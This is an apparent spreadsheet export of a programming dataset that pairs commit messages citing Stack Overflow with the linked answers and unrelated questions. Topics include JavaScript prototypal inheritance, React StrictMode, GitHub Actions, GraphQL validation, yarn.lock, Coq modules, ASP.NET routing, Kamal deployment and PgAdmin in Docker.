In the same sense classes are just meta-data. Classes aren't strictly required for inheritance. However some people (usually n00bs) find classes more comfortable to work with. It gives them a false sense of security.
Well, we also know that static types are just metadata. They're a specialized kind of comment targeted at two kinds of readers: programmers and compilers. Static types tell a story about the computation, presumably to help both reader groups understand the intent of the program. But the static types can be thrown away at runtime, because in the end they're just stylized comments. They're like pedigree paperwork: it might make a certain insecure personality type happier about their dog, but the dog certainly doesn't care.
As I stated earlier, classes give people a false sense of security. For example you get too many NullPointerExceptions in Java even when your code is perfectly legible. I find classical inheritance usually gets in the way of programming, but maybe that's just Java. Python has an amazing classical inheritance system.
2. Prototypal Inheritance is Powerful
Most programmers who come from a classical background argue that classical inheritance is more powerful than prototypal inheritance because it has:
Private variables.
Multiple inheritance.
This claim is false. We already know that JavaScript supports private variables via closures, but what about multiple inheritance? Objects in JavaScript only have one prototype.
The truth is that prototypal inheritance supports inheriting from multiple prototypes. Prototypal inheritance simply means one object inheriting from another object. There are actually two ways to implement prototypal inheritance:
Delegation or Differential Inheritance
Cloning or Concatenative Inheritance
Yes JavaScript only allows objects to delegate to one other object. However it allows you to copy the properties of an arbitrary number of objects. For example _.extend does just this.
Of course many programmers don't consider this to be true inheritance because instanceof and isPrototypeOf say otherwise. However this can be easily remedied by storing an array of prototypes on every object which inherits from a prototype via concatenation:
function copyOf(object, prototype) {
    var prototypes = object.prototypes;
    var prototypeOf = Object.isPrototypeOf;
    return prototypes.indexOf(prototype) &gt;= 0 ||
        prototypes.some(prototypeOf, prototype);
}
Hence prototypal inheritance is just as powerful as classical inheritance. In fact it's much more powerful than classical inheritance because in prototypal inheritance you can hand pick which properties to copy and which properties to omit from different prototypes.
In classical inheritance it's impossible (or at least very difficult) to choose which properties you want to inherit. They use virtual base classes and interfaces to solve the diamond problem.
In JavaScript however you'll most likely never hear of the diamond problem because you can control exactly which properties you wish to inherit and from which prototypes.
3. Prototypal Inheritance is Less Redundant
This point is a little more difficult to explain because classical inheritance doesn't necessarily lead to more redundant code. In fact inheritance, whether classical or prototypal, is used to reduce the redundancy in code.
One argument could be that most programming languages with classical inheritance are statically typed and require the user to explicitly declare types (unlike Haskell which has implicit static typing). Hence this leads to more verbose code.
Java is notorious for this behavior. I distinctly remember Bob Nystrom mentioning the following anecdote in his blog post about Pratt Parsers:
You gotta love Java's "please sign it in quadruplicate" level of bureaucracy here.
Again, I think that's only because Java sucks so much.
One valid argument is that not all languages which have classical inheritance support multiple inheritance. Again Java comes to mind. Yes Java has interfaces, but that's not sufficient. Sometimes you really need multiple inheritance.
Since prototypal inheritance allows for multiple inheritance, code which requires multiple inheritance is less redundant if written using prototypal inheritance rather than in a language which has classical inheritance but no multiple inheritance.
4. Prototypal Inheritance is Dynamic
One of the most important advantages of prototypal inheritance is that you can add new properties to prototypes after they are created. This allows you to add new methods to a prototype which will be automatically made available to all the objects which delegate to that prototype.
This is not possible in classical inheritance because once a class is created you can't modify it at runtime. This is probably the single biggest advantage of prototypal inheritance over classical inheritance, and it should have been at the top. However I like saving the best for the end.
Conclusion
Prototypal inheritance matters. It's important to educate JavaScript programmers on why to abandon the constructor pattern of prototypal inheritance in favor of the prototypal pattern of prototypal inheritance.
We need to start teaching JavaScript correctly and that means showing new programmers how to write code using the prototypal pattern instead of the constructor pattern.
Not only will it be it easier to explain prototypal inheritance using the prototypal pattern, but it will also make better programmers.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using &lt;code&gt;Popscope&lt;/code&gt; on my local authview- a screen where user enters a pin to enter the app. When user hit backbutton it is clearing the entered pin but does not close the app. It is the first screen when user opens the app. When I set &lt;code&gt;canPop&lt;/code&gt; parameter to true it will close app without clearing entered pin. I want to clear the entered pin if user entered something and close the app when hit back button&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C722</t>
  </si>
  <si>
    <t>Disable react strict mode to prevent double rendering
See https://stackoverflow.com/questions/61254372/my-react-component-is-rendering-twice-because-of-strict-mode
Signed-off-by: Tilman Vatteroth &lt;git@tilmanvatteroth.de&gt;</t>
  </si>
  <si>
    <t>StrictMode renders components twice (on dev but not production) in order to detect any problems with your code and warn you about them (which can be quite useful).
If you have StrictMode enabled in your app but don't remember enabling it, it might be because you used create-react-app or similar to create your app initially, which automatically enables StrictMode by default.
For example, you might find that your {app} is wrapped by
&lt;React.StrictMode&gt;
in your index.js:
ReactDOM.render(
     &lt;React.StrictMode&gt;
       {app}
     &lt;/React.StrictMode&gt;,
    document.getElementById('root')
  );
If so, you can disable StrictMode by removing the
&lt;React.StrictMode&gt;
tag:
ReactDOM.render(
    {app}
    document.getElementById('root')
  );</t>
  </si>
  <si>
    <t xml:space="preserve">Going to develop a search engine.
I'm wondering how my DDD should look. Sorting records should be implemented, but i don't want that my views knew about my database structure (by which columns to sort). As far as i understand - sorting information should come from infrastructure layer, from repository implementation, so there have to be a flexible domain. 
How it should look? 
I want this to be strongly typed.
Any best practices?
Recommendations for architecture?
</t>
  </si>
  <si>
    <t>C723</t>
  </si>
  <si>
    <t>Use run-tests.yaml as a top-level job, not a step
The original pipeline.yaml resulted in an error:
  Error: .github#L1
  reusable workflows should be referenced at the top-level `jobs.*.uses'
  key, not within steps
Though this document shows the correct usage:
https://docs.github.com/en/actions/using-workflows/reusing-workflows
it wasn't entirely obvious. I got the tip as to what was going on from:
https://stackoverflow.com/a/71343419</t>
  </si>
  <si>
    <t>Try the following:
name: HelloWorld 
 on:
  workflow_dispatch:
 jobs:
  checkout:
   uses: org/repo/.github/workflows/build.yml@main
   with:
    jdk_version: 11
And then at the beginning of build.yml, you can do
runs-on: windows-latest
steps:
 - uses: actions/checkout@v2
For whatever reason reusable workflows can't be inside
steps
, so you have to just use it at the top-level and do all your configuration/other steps inside the workflow you're calling.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am new to R and trying replicate work from research I come across.&lt;/p&gt;
&lt;p&gt;I am looking to replicate this flowchart:&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/wjxvS7rY.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/wjxvS7rY.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;This is the code I have so far:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;library(DiagrammeR)
grViz(&amp;quot; digraph sample_selection {   graph [layout = dot, rankdir = TB, splines = ortho, overlap = true]
  node [shape = box, style = filled, fillcolor = white]
  # Nodes for each year   '2010 Survey\\nParticipants\\n(n = 32,846)' [group = years]   '2011 Survey\\nParticipants\\n(n = 35,313)' [group = years]   '2012 Survey\\nParticipants\\n(n = 38,974)' [group = years]   '2013 Survey\\nParticipants\\n(n = 36,940)' [group = years]
  # Combined node   '2010-2013\\n(n = 144,073)'
  # Exclusion nodes   'Excluded participants\\n&amp;lt;18 years at time of\\nsurvey\\n(n = 41,277)'   'Excluded participants\\nwithout medical visit\\nin the last 12 months\\n(45,843)' [style = 'filled,rounded', penwidth = 2, fillcolor = white, color = black]   'Excluded participants\\nwithout a usual\\nsource of care\\n(n = 8,984)'
  # Final sample node   'Final Sample\\npopulation (n = 47,969)\\nrepresenting 130\\nmillion individuals'
  # Intermediate node   'n = 102,796'   'n = 56,953'
  # Edges   {rank = same; '2010 Survey\\nParticipants\\n(n = 32,846)'; '2011 Survey\\nParticipants\\n(n = 35,313)'; '2012 Survey\\nParticipants\\n(n = 38,974)'; '2013 Survey\\nParticipants\\n(n = 36,940)'}   {rank = same; '2010-2013\\n(n
= 144,073)'}   '2010 Survey\\nParticipants\\n(n = 32,846)' -&amp;gt; '2010-2013\\n(n = 144,073)'   '2011 Survey\\nParticipants\\n(n = 35,313)' -&amp;gt; '2010-2013\\n(n = 144,073)'   '2012 Survey\\nParticipants\\n(n = 38,974)' -&amp;gt; '2010-2013\\n(n = 144,073)'   '2013 Survey\\nParticipants\\n(n = 36,940)' -&amp;gt; '2010-2013\\n(n = 144,073)'
  '2010-2013\\n(n = 144,073)' -&amp;gt; 'Excluded participants\\n&amp;lt;18 years at time of\\nsurvey\\n(n = 41,277)'   '2010-2013\\n(n = 144,073)' -&amp;gt; 'n = 102,796'
  'n = 102,796' -&amp;gt; 'Excluded participants\\nwithout medical visit\\nin the last 12 months\\n(45,843)'   'n = 102,796' -&amp;gt; 'n = 56,953'
  'n = 56,953' -&amp;gt; 'Excluded participants\\nwithout a usual\\nsource of care\\n(n = 8,984)'   'n = 56,953' -&amp;gt; 'Final Sample\\npopulation (n = 47,969)\\nrepresenting 130\\nmillion individuals' } &amp;quot;)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Which produces this:
&lt;a href="https://i.sstatic.net/e85jnqZv.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/e85jnqZv.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Guidance on how to get those lines merged together?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C724</t>
  </si>
  <si>
    <t>Fix notifications to avoid flicker on KitKat
On KitKat you need to reuse the same notification builder when
generating a notification that's intended to replace a previous
one. See:
https://stackoverflow.com/questions/6406730/updating-an-ongoing-notification-quietly</t>
  </si>
  <si>
    <t xml:space="preserve">These two terms are very diffused. How exactly do they differ?
Is there any real life example or scenario that can elaborate this difference?
</t>
  </si>
  <si>
    <t>C725</t>
  </si>
  <si>
    <t>Return warnings in some cases
I believe some of the exceptions we are throwing are a bit heavy handed. I think in some instances we need to return some warning data, but still run the query. The convo in the slack channel actually got me thinking about this.
For instance; if someone queries for 200 posts, and the limit is still set to 100, ideally I think we should return the 100 posts, but also return a warning that says what was requested was over the hard limit.
I think the response data could look something like the following:
The top answer here kinda does what I'm suggesting. Captures "errors" within the resolver, allows the database edit to partly go through and return errors for what didn't go through. https://stackoverflow.com/questions/32662437/graphql-and-form-validation-errors</t>
  </si>
  <si>
    <t>With validation logic inside the
resolve
method, you have complete control over the generated user errors. Here is an example:
// data/mutations/createUser.js
import {
  GraphQLObjectType as ObjectType,
  GraphQLNonNull as NonNull,
  GraphQLList as List,
  GraphQLString as StringType
} from 'graphql';
import validator from 'validator';
import UserType from '../types/UserType';
export default {
  type: new ObjectType({
    name: 'CreateUserResult',
    fields: {
      user: { type: UserType },
      errors: { type: new NonNull(new List(StringType)) }
    }
  }),
  args: {
    email: { type: new NonNull(StringType) },
    password: { type: new NonNull(StringType) }
  },
  resolve(_, { email, password }) {
    let user = null;
    let errors = [];
    if (validator.isNull(email)) {
      errors.push(...['email', 'The email filed must not be empty.']);
    } else if (!validator.isLength(email, { max: 100})) {
      errors.push(...['email', 'The email must be at a max 100 characters long.']);
    }
    // etc.
    return { user, errors };
  }
};
See my blog post on this subject -
Validation and User Errors in GraphQL Mutations
Alternatively, create
type UserErrorType { key: String!, message: String! }
that can be used instead of plain strings when you compile the list of user errors to be returned to the caller.
GraphQL Query
mutation {
  createUser(email: "
[email protected]
", password: "Passw0rd") {
    user { id, email },
    errors { key, message }
  }
}
Query Response
{
  data: {
    user: null,
    errors: [
      { key: '', message: 'Failed to create a new user account.' },
      { key: 'email', message: 'User with this email already exists.' }
    ]
  }
}</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We represent the empty tree by the atom 'nil' and the non-empty tree by the term t(X,L,R), where X denotes the root node and L and R denote the left and right subtree, respectively.&lt;/p&gt;
&lt;p&gt;As such, a predicate that tests if a term represents a binary tree is as follows:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;is_tree(nil).
is_tree(t(_, Left, Right)) :-
    is_tree(Left), is_tree(Right).
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And it works great, for example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;% ?- is_tree(nil).
%@    true.
% ?- is_tree(t(a, nil, nil)).
%@    true.
% ?- is_tree(t(a, t(b, nil, nil), nil)).
%@    true.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, when posed with a general query, it only seems to create right side nodes:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;% ?- is_tree(X).
%@    X = nil
%@ ;  X = t(_A,nil,nil)
%@ ;  X = t(_A,nil,t(_B,nil,nil))
%@ ;  ... .
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now, if X was a list, I could have just prepended the query with &lt;code&gt;length(X, _)&lt;/code&gt; to get iterative deepening. However, seeing as the argument is not a list, I am at a loss on how to get a fair enumeration.&lt;/p&gt;
&lt;p&gt;I tried to make a predicate that calculates the depth of the tree:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;tree_depth(nil, 0).
tree_depth(t(_, Left, Right), Depth) :-
    tree_depth(Left, D0), tree_depth(Right, D1),
    Depth #= max(D0, D1) + 1. 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And then tried to limit it with a constraint, but all I got was a nonterminating query, which, upon inspection, just keeps on generating deeper and deeper trees with only right hand subtrees:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;% ?- Y #&amp;lt; 3, tree_depth(X, Y), is_tree(X).
%@    Y = 0, X = nil
%@ ;  Y = 1, X = t(_A,nil,nil)
%@ ;  Y = 2, X = t(_A,nil,t(_B,nil,nil))
%@ ;  *hangs*
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;At this point I am unsure what should I do, nor what am I doing wrong. I am using scryer prolog if it matters.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C726</t>
  </si>
  <si>
    <t>fix: reset script from package.json does not work #1656
fixes: #1656
Upon reading further about yarn.lock, del-cli yarn.lock wasn't needed and may cause problems.
Letting yarn update the yarn.lock file is the better way in terms of updating dependencies.
(https://classic.yarnpkg.com/en/docs/yarn-lock/#toc-managed-by yarn : # Managed by Yarn)
(https://stackoverflow.com/questions/60509429)
(https://stackoverflow.com/questions/41126217)
Testing has also been done in terms of using "del-cli '**/node_modules'" and reinstalling it.
yarn del-cli emptied node_modules.
yarn install --update-checksum --force checks yarn.lock and updates it necessarily
and also installs node_modules together.
(https://classic.yarnpkg.com/en/docs/cli/install)
(https://stackoverflow.com/questions/41864099)
(https://www.codegrepper.com/code-examples/shell/yarn+reinstall+all+packages)
yarn configure configured the package and outputs all lerna success.
yarn reset is also reusable even after using yarn reset once.</t>
  </si>
  <si>
    <t>Yarn.lock is a generated file yarn uses to know what versions of each dependency are installed so it can get those exact versions again when you run yarn install on a new machine. You don't need to delete it to remove the packages you aren't using any more from it, just remove them from package.json and run yarn upgrade and it will uninstall those packages and generate a new lock file without them</t>
  </si>
  <si>
    <t xml:space="preserve">Model Driven Architecture is the idea that you create models which express the problem you need to solve in a way that is free of any (or at least most) implementation technologies, and then you generate implementation for one or more specific platforms. The claim is that working at a higher level of abstraction is far more powerful and productive. In addition, your models outlive technologies (so you still have something when your first language / platform becomes obsolete that you can use for your next generation solution). Another key claimed benefit is that much of the boilerplate and "grunt work" can be generated. Once the computer understands the semantics of your situation, it can help you more.
Some claim this approach is 10 times more productive, and that it is the way we will all be building software in 10 years.
However, this is all just theory. I am wondering what the outcomes are when the rubber meets the road. Also, the "official" version of MDA is from the [external-link], and seems very heavy. It is heavily based on UML, which might be considered good or bad depending on who you ask (I'm leaning towards "bad").
But, in spite of those concerns, it is hard to argue with the idea of working at a higher level of abstraction and "teaching" the computer to understand the semantics of your problem and solution. Imagine a series of ER models which simply express truth, and then imagine using those to generate a significant portion of your solution, first in one set of technologies and then again in another set of technologies.
So, I'd love to hear from people who really are doing MDA right now ("official" or not). What tools are you using? How is it working out? How much of the theoretical promise have you been able to capture? Do you see a true 10X effectiveness increase?
</t>
  </si>
  <si>
    <t>C727</t>
  </si>
  <si>
    <t>AttributeError: module 'pandas' has no attribute 'core' - Pandas can't be imported
Code Sample, a copy-pastable example if possible
import pandas as pd
import pandas_profiling
df=pd.read_csv("test.xlsx", parse_dates=True, encoding='UTF-8')
profile = pandas_profiling.ProfileReport(df)
profile.to_file(outputfile="Test.html")
Problem description
''''
Importing pandas throws hairball
Done - thanks.
More info for those interested: https://stackoverflow.com/questions/52979322/matplotlib-3-0-0-cannot-import-name-get-backend-from-matplotlib</t>
  </si>
  <si>
    <t>This issue has been reported
here
and has been fixed
here
. The fix will be available in matplotlib 3.0.1, which is scheduled to be release within the next few days.
Until then you may either use python &lt;= 3.6.6 with matplotlib 3.0.0. Or you may use matplotlib 2.2.3 or you may try the fix proposed in
the linked issue
, namely to create a matplotlibrc file in one of the paths where matplotlib would find it.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do you  backslash escape Vue directives in a Kendo UI Template.&lt;/p&gt;
&lt;p&gt;I want to escape a v-model on my Kendo UI template.&lt;/p&gt;
&lt;p&gt;This is how I tired to escape them but it did not work&amp;gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;input type=&amp;quot;checkbox&amp;quot;  \# v-model=&amp;quot;checked&amp;quot; \# &amp;gt; 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I tried using a double escaped &amp;quot;\#&amp;quot; like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; &amp;lt;input type=&amp;quot;checkbox&amp;quot;  \\# v-model=&amp;quot;checked&amp;quot; \\# &amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But it did not work when i examined the page via chrome dev tool this is how the page is displayed:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;input type=&amp;quot;checkbox&amp;quot; #=&amp;quot;&amp;quot; v-model=&amp;quot;checked&amp;quot;&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C728</t>
  </si>
  <si>
    <t>Avoid web.config inheritance in child web application
- https://stackoverflow.com/q/782252
- https://learn.microsoft.com/aspnet/core/host-and-deploy/iis/web-config#configuration-of-aspnet-core-module-with-webconfig</t>
  </si>
  <si>
    <t>As the commenters for the previous answer mentioned, you cannot simply add the line...
&lt;location path="." inheritInChildApplications="false"&gt;
...just below
&lt;configuration&gt;
. Instead, you need to wrap the individual web.config sections for which you want to disable inheritance. For example:
&lt;!-- disable inheritance for the connectionStrings section --&gt;
&lt;location path="." inheritInChildApplications="false"&gt;
   &lt;connectionStrings&gt;
   &lt;/connectionStrings&gt;
&lt;/location&gt;
&lt;!-- leave inheritance enabled for appSettings --&gt;
&lt;appSettings&gt;
&lt;/appSettings&gt;
&lt;!-- disable inheritance for the system.web section --&gt;
&lt;location path="." inheritInChildApplications="false"&gt;
   &lt;system.web&gt;
        &lt;webParts&gt;
        &lt;/webParts&gt;
        &lt;membership&gt;
        &lt;/membership&gt;
        &lt;compilation&gt;
        &lt;/compilation&gt;
      &lt;/system.web&gt;
 &lt;/location&gt;
While
&lt;clear /&gt;
may work for some configuration sections, there are some that instead require a
&lt;remove name="..."&gt;
directive, and still others don't seem to support either. In these situations, it's probably appropriate to set
inheritInChildApplications="false"
.</t>
  </si>
  <si>
    <t xml:space="preserve">I was wondering what exactly is the difference between MVC(which is an architectural pattern) and an n-tier architecture for an application. I searched for it but couldn't find a simple explanation. May be I am a bit naive on MVC concepts, so if anyone can explain the difference then it would be great.
</t>
  </si>
  <si>
    <t>C729</t>
  </si>
  <si>
    <t>Translated Cyclers: handle left-facing records
This required restructuring the module graph. Turns out that
diamond inheritance is Not Gonna Work. [1] As a workaround,
linearlize the dependency graph.
[1]: https://stackoverflow.com/questions/62003542/coq-unify-types-from-module-functors-with-same-parameters</t>
  </si>
  <si>
    <t>This is not possible. There is no structural equivalence between inductive types. By using
Include
twice, you are creating two different types. They happen to have the same name, but this is just a coincidence.
More generally, inductive types are badly supported by the module system. Any time you try something a bit fancy, Coq will complain that "The kernel does not recognize yet that a parameter can be instantiated by an inductive type."
As a rule of thumb, I suggest to always define inductive types outside module functors. I suppose that your type
foo
would depend on some property of module
s
, so you have to make it a bit more generic:
Module Type S.
Axiom t : Type.
End S.
Inductive foo (t : Type) : Type := a : t -&gt; foo t.
Module F (s : S).
Definition foo := foo s.t.
End F.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am deploying an nextjs-golang-crud-app with Kamal 2 (source: &lt;a href="https://github.com/pooulad/nextjs-golang-crud-app" rel="nofollow noreferrer"&gt;https://github.com/pooulad/nextjs-golang-crud-app&lt;/a&gt;). When I run &lt;code&gt;kamal setup&lt;/code&gt; to deploy the golang backend and database to localhost, I encountered this error:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ERROR (KeyError): Exception while executing as ubuntu@localhost: key not found: #&amp;lt;SSHKit::Host:0x000059c7eb101ed8 @keys=[], @local=false, @use...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The container still starting, but I cannot access to it through my kamal-proxy.
This is my config/deploy.yml file:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;service: ngca-backend
image: hunger1607/ngca-backend
servers:
  - localhost
ssh:
  keys: [~/abel-ec2-keypair.pem]
  user: ubuntu
  keys_only: true
registry:
  username:
    - DOCKER_REGISTRY_USERNAME
  password:
    - DOCKER_REGISTRY_PASSWORD
builder:
  arch:
    - amd64
  dockerfile: Dockerfile
env:
  clear:
    API_PORT: &amp;quot;8080&amp;quot;
    DB_PORT: &amp;quot;5432&amp;quot;
    DB_USER: &amp;quot;postgres&amp;quot;
    DB_PASS: &amp;quot;postgres&amp;quot;
    DB_NAME: &amp;quot;postgres&amp;quot;
    DB_HOST: &amp;quot;ngca-backend-db&amp;quot;
accessories:
  db:
    image: postgres:15
    host: ubuntu@localhost
    port: 5432
    env:
      clear:
        POSTGRES_USER: postgres
        POSTGRES_DB: postgres
      secret:
        - POSTGRES_PASSWORD
proxy:
  app_port: 8080
  response_timeout: 210
  healthcheck:
    interval: 5
    path: /swagger/index.html
    timeout: 300
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have stored my key correctly in the host.&lt;/p&gt;
&lt;p&gt;I tried to check the SSHKit and use &lt;code&gt;ssh-add&lt;/code&gt; to add my key, but it did not work.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C73</t>
  </si>
  <si>
    <t>revisited handling club RouteConstraint
Found an important example at
http://stackoverflow.com/questions/9003736/asp-net-mvc-custom-route-constraints-dependency-injection-and-unit-testing</t>
  </si>
  <si>
    <t>Personally I try and avoid performing such validation within a route constraint as it is much harder to express your intentions this way. Instead I use constraints to ensure parameters are in the correct format/type and put such logic in my controllers.
In your example I'm assuming that if the country is not valid then you will fall back to a different route (say to a "Country Not Found" page). Relying on your routing configuration is much less reliable (and much more likely to be broken) than accepting all country parameters and checking them in your controller:
public ActionResult Country(string country)
    {
        if (country == "france") // lookup to db here
        {
            // valid
            return View();
        }
        // invalid 
        return RedirectToAction("NotFound");
    }
That aside, what you are trying to achieve here (as has already been mentioned) is actually an integration test. When you find that parts of the framework are getting in the way of your tests then it could be time for a refactor. In your example I would want to test
That Countries are validated correctly
My routing configuration.
The first thing we can do is move the Country validation into a separate class:
public interface ICountryValidator
{
    bool IsValid(string country);
}
public class CountryValidator : ICountryValidator
{
    public bool IsValid(string country)
    {
        // you'll probably want to access your db here
        return true;
    }
}
We can then test this as a unit:
[Test]
    public void Country_validator_test()
    {
        var validator = new CountryValidator();
        // Valid Country
        Assert.IsTrue(validator.IsValid("france"));
        // Invalid Country
        Assert.IsFalse(validator.IsValid("england"));
    }
Our
CountryRouteConstraint
then changes to:
public class CountryRouteConstraint : IRouteConstraint
{
    private readonly ICountryValidator countryValidator;
    public CountryRouteConstraint(ICountryValidator countryValidator)
    {
        this.countryValidator = countryValidator;
    }
    public bool Match(HttpContextBase httpContext, Route route, string parameterName, RouteValueDictionary values, RouteDirection routeDirection)
    {
        object country = null;
        values.TryGetValue("country", out country);
        return countryValidator.IsValid(country as string);
    }
}
We map our route like so:
routes.MapRoute(
    "Valid Country Route", 
    "countries/{country}", 
    new { controller = "Home", action = "Country" },
    new { country = new CountryRouteConstraint(new CountryValidator()) 
});
Now if you really feel it is necessary to test the RouteConstraint you can test this independently:
[Test]
    public void RouteContraint_test()
    {
        var constraint = new CountryRouteConstraint(new CountryValidator());
        var testRoute = new Route("countries/{country}",
            new RouteValueDictionary(new { controller = "Home", action = "Country" }),
            new RouteValueDictionary(new { country = constraint }),
            new MvcRouteHandler());
        var match = constraint.Match(GetTestContext(), testRoute, "country", 
            new RouteValueDictionary(new { country = "france" }), RouteDirection.IncomingRequest);
        Assert.IsTrue(match);
    }
Personally I wouldn't bother performing this test as we've already abstracted the validation code so really this is just testing the framework.
To test the route mapping we can use MvcContrib's
TestHelper
.
[Test]
    public void Valid_country_maps_to_country_route()
    {
        "~/countries/france".ShouldMapTo&lt;HomeController&gt;(x =&gt; x.Country("france"));
    }
    [Test]
    public void Invalid_country_falls_back_to_default_route()
    {
        "~/countries/england".ShouldMapTo&lt;HomeController&gt;(x =&gt; x.Index());
    }
Based on our routing configuration we can verify that a valid country maps to the country route and an invalid country maps to the fallback route.
However, the main point of your question was how to handle the dependencies of route constraints. The test above is actually testing a number of things - our routing configuration, route constraint, validator and probably access to a repository/database.
If you're relying on a IoC tool to inject these for you, you're going to have to mock your validator and repository/db and register these with your IoC tool in the set up of your tests.
It would be better if we could control how constraints are created:
public interface IRouteConstraintFactory
{
    IRouteConstraint Create&lt;TRouteConstraint&gt;() 
        where TRouteConstraint : IRouteConstraint;
}
Your "real" implementation can just use your IoC tool to create the
IRouteConstraint
instance.
I like to put my routing configuration in a separate class like so:
public interface IRouteRegistry
{
    void RegisterRoutes(RouteCollection routes);
}
public class MyRouteRegistry : IRouteRegistry
{
    private readonly IRouteConstraintFactory routeConstraintFactory;
    public MyRouteRegistry(IRouteConstraintFactory routeConstraintFactory)
    {
        this.routeConstraintFactory = routeConstraintFactory;
    }
    public void RegisterRoutes(RouteCollection routes)
    {
        routes.MapRoute(
            "Valid Country", 
            "countries/{country}", 
            new { controller = "Home", action = "Country" },
            new { country = routeConstraintFactory.Create&lt;CountryRouteConstraint&gt;() });
        routes.MapRoute("Invalid Country", 
            "countries/{country}", 
            new { controller = "Home", action = "index" });
    }
}
Constraints with external dependencies can be created using the factory.
This makes testing much easier. Since we're only interested in testing the country routes we can create a test factory that does only what we need:
private class TestRouteConstraintFactory : IRouteConstraintFactory
    {
        public IRouteConstraint Create&lt;TRouteConstraint&gt;() where TRouteConstraint : IRouteConstraint
        {
            return new CountryRouteConstraint(new FakeCountryValidator());
        }
    }
Note that this time we're using a
FakeCountryValidator
that contains just enough logic for us to test our routes:
public class FakeCountryValidator : ICountryValidator
{
    public bool IsValid(string country)
    {
        return country.Equals("france", StringComparison.InvariantCultureIgnoreCase);
    }
}
When we set up our tests we pass the
TestRouteFactoryConstraint
to our route registry:
[SetUp]
    public void SetUp()
    {
        new MyRouteRegistry(new TestRouteConstraintFactory()).RegisterRoutes(RouteTable.Routes);
    }
This time when we run our routing tests we're
not
testing our validation logic or database access. Instead we are unit testing our routing configuration when either a valid or invalid country is provided.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to access the PgAdmin web interface running in a Docker container, but I keep getting the error:&lt;/p&gt;
&lt;p&gt;&amp;quot;This site canâ€™t be reached. The connection was reset.&amp;quot;&lt;/p&gt;
&lt;h4&gt;My Setup:&lt;/h4&gt;
&lt;p&gt;Docker Engine: Integrated with WSL 2 on Windows using Hyper-V&lt;/p&gt;
&lt;p&gt;PgAdmin Container: Running with the following configuration:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CONTAINER ID         IMAGE          COMMAND               CREATED                   STATUS               PORTS                NAMES 
b3d84fe03656   dpage/pgadmin4   &amp;quot;/entrypoint.sh&amp;quot;    30 minutes ago   Up 30 minutes   443/tcp, 0.0.0.0:5050-&amp;gt;80/tcp, [::]:5050-&amp;gt;80/tcp      pgadmin 
b55addacc28d   postgres         &amp;quot;docker-entrypoint.sâ€¦&amp;quot;   4 days ago       Up 2 hours      0.0.0.0:5432-&amp;gt;5432/tcp, :::5432-&amp;gt;5432/tcp       java_postgres_
&lt;/code&gt;&lt;/pre&gt;
&lt;h4&gt;Questions:&lt;/h4&gt;
&lt;p&gt;Why is the PgAdmin web interface not accessible from the host machine?
Are there any additional configurations required to expose the web interface properly?
Should I change the network mode or manually set an IP for PgAdmin?&lt;/p&gt;
&lt;p&gt;Any help is appreciated! ðŸš€&lt;/p&gt;
&lt;h4&gt;What I Tried:&lt;/h4&gt;
&lt;ol&gt;
&lt;li&gt;Checking PgAdmin's Internal IP:&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;I entered the PgAdmin container and ran ip addr show, which gave me:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;~$ hostname -I
192.168.1.54 
169.254.73.153
172.17.0.1
172.20.0.1 
172.19.0.1 
172.18.0.1
~$ hostname -i
127.0.1.1
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code&gt;9: eth0@if10: \&amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP,M-DOWN\&amp;gt; mtu 1500 qdisc noqueue state UP
link/ether 02:42:ac:11:00:03 brd ff:ff:ff:ff:ff:ff
inet 172.17.0.3/16 brd 172.17.255.255 scope global eth0
&lt;/code&gt;&lt;/pre&gt;
&lt;ol start="2"&gt;
&lt;li&gt;Trying to Access from Host Machine:&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Opened the browser and entered &lt;a href="http://192.168.1.54:5050" rel="nofollow noreferrer"&gt;http://192.168.1.54:5050&lt;/a&gt; (my local machine's IP).
Also tried http://localhost:5050 and &lt;a href="http://127.0.0.1:5050" rel="nofollow noreferrer"&gt;http://127.0.0.1:5050&lt;/a&gt;, but none worked.&lt;/p&gt;
